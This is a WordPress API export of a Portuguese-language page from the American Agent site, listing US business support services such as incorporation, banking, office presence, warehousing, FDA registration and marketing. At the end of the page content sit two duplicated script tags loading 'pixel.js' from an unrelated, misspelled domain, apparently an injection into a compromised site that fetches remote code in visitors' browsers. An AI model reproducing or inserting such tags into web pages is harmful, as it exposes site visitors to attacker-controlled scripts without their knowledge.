{"id":3438,"date":"2014-08-16T07:17:42","date_gmt":"2014-08-16T07:17:42","guid":{"rendered":"https:\/\/americanagent.com\/usa-business-support-services-2\/"},"modified":"2014-11-14T08:35:13","modified_gmt":"2014-11-14T13:35:13","slug":"eua-servicos-de-apoio","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/","title":{"rendered":"EUA servi\u00e7os de apoio"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-a00d03b14d0c306d26d63ffd9d1dcf9f\">\n#top .av-special-heading.av-av_heading-a00d03b14d0c306d26d63ffd9d1dcf9f{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-a00d03b14d0c306d26d63ffd9d1dcf9f .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-a00d03b14d0c306d26d63ffd9d1dcf9f .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-a00d03b14d0c306d26d63ffd9d1dcf9f av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >EUA servi\u00e7os de apoio<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-0366cc7376be6c9e82a3e9cc8987b64f '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Por vezes, h\u00e1 alguns servi\u00e7os importantes que s\u00e3o necess\u00e1rios para completar a solu\u00e7\u00e3o. A listagem abaixo reflete os servi\u00e7os que s\u00e3o realizados pela rede de parceiros comprovada.<\/p>\n<p>Muitos dos parceiros estiveram envolvidos com os mesmos clientes. Por j\u00e1 conhecer o processo e outras pessoas envolvidas, o resultado \u00e9 uma solu\u00e7\u00e3o econ\u00f3mica e um processo de comunica\u00e7\u00e3o r\u00e1pido.<\/p>\n<p>A lista abaixo serve apenas como uma apresenta\u00e7\u00e3o de algumas das quest\u00f5es que somos capazes de orquestrar em seu nome aqui nos EUA.<\/p>\n<\/div><\/section><br \/>\n<div  class='avia-icon-list-container av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6  avia-builder-el-3  el_after_av_textblock  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-35ebed3cb840df3f926433fac93474b0 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Incorporating in the USA (Inc. or LLC)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Incorporating in the USA (Inc. or LLC)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-1b02faf2fb129e0edf909216d416e3c0 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Local Banking matters\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Local Banking matters<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Invoicing, collecting, accounting and tax preparations by known and trustworthy Chicago partner companies.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-788b25060083fd5c99a77e194ab50c54 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: American office\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >American office<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Your own dedicated address and telephone number with answering service, very good for local customer support and displaying local USA presence.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-718dd77571cfe42dde02508018853508 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Product warehousing and storage (warm or frozen)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Product warehousing and storage (warm or frozen)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Product logistics, nationwide product distribution.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-b2e1b4ffab6ff7504506ed9682162e1e avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Warranty and product return programs.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Warranty and product return programs.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-0632ff3ac9f29d9c233ad400398ea3ca avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: FDA registrations\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >FDA registrations<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>American Agent is already name as \u201clocal agent\u201d with the FDA (U.S. Food and Drug Administration)<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-ded76d978f4e3ad749b1e5d6614087bc avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Tradeshow matters\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Tradeshow matters<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Applications, pre-tradeshow marketing, organize necessary gear, shipping, show time translators, find extra personnel to cover the floor if necessary.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-06f24eb7a300028679ec5384fb4ea7e7 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Anything marketing\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Anything marketing<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Local websites, translations, brochures, catalogs, local printing, organized mail outs \u2026<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-bb83e51f810e4522d0ce7e0b1a1851b6 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Local USA attorney\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Local USA attorney<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>For overseeing any contracts with Distributors \/ Representatives \/ Customers \/ Partners. Any other situation requiring review of legal attention.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-6e168117484828af3387784f81f10a27 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Collections of past due accounts\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Collections of past due accounts<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-67559244e6900ca848a9e4d3fa313a0c avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Background checks of potential partners\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Background checks of potential partners<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3438","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - EUA servi\u00e7os de apoio<\/title>\n<meta name=\"description\" content=\"Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - EUA servi\u00e7os de apoio\" \/>\n<meta property=\"og:description\" content=\"Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-11-14T13:35:13+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/eua-servicos-de-apoio\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/eua-servicos-de-apoio\\\/\",\"name\":\"American Agent - EUA servi\u00e7os de apoio\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:42+00:00\",\"dateModified\":\"2014-11-14T13:35:13+00:00\",\"description\":\"Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/eua-servicos-de-apoio\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/eua-servicos-de-apoio\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/eua-servicos-de-apoio\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"EUA servi\u00e7os de apoio\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - EUA servi\u00e7os de apoio","description":"Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/","og_locale":"pt_BR","og_type":"article","og_title":"American Agent - EUA servi\u00e7os de apoio","og_description":"Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.","og_url":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-11-14T13:35:13+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/","url":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/","name":"American Agent - EUA servi\u00e7os de apoio","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-br\/#website"},"datePublished":"2014-08-16T07:17:42+00:00","dateModified":"2014-11-14T13:35:13+00:00","description":"Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-br\/"},{"@type":"ListItem","position":2,"name":"EUA servi\u00e7os de apoio"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-br\/#website","url":"https:\/\/americanagent.com\/pt-br\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3438","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/comments?post=3438"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3438\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/media?parent=3438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}